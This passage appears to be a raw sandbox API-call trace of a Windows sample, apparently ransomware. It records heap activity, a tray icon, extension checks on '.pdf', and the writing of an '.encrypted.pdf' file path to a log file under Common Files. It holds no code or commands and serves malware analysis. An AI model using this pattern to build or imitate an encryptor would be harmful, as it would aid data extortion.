Size=0x4) returned 0x7af478 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.433] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.433] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.434] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0035.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.434] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 1 [0035.434] TranslateMessage (lpMsg=0x6aeb94) returned 0 [0035.434] DispatchMessageW (lpMsg=0x6aeb94) returned 0x0 [0035.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.434] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae230) returned 1 [0035.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.435] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0035.435] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0035.435] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0035.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.436] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.437] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x170) returned 0x7c5448 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.439] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.439] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.439] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.439] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.439] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.439] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.440] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1966, lpOverlapped=0x0) returned 1 [0035.440] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.440] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1966, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.440] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.encrypted.pdf\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0035.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0035.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.encrypted.pdf\r\n", cchWideChar=96, lpMultiByteStr=0x87a9d8, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.encrypted.pdf\r\n", lpUsedDefaultChar=0x0) returned 96 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0035.440] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5f, lpOverlapped=0x0) returned 1 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0035.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.440] CloseHandle (hObject=0x128) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.441] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.441] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: 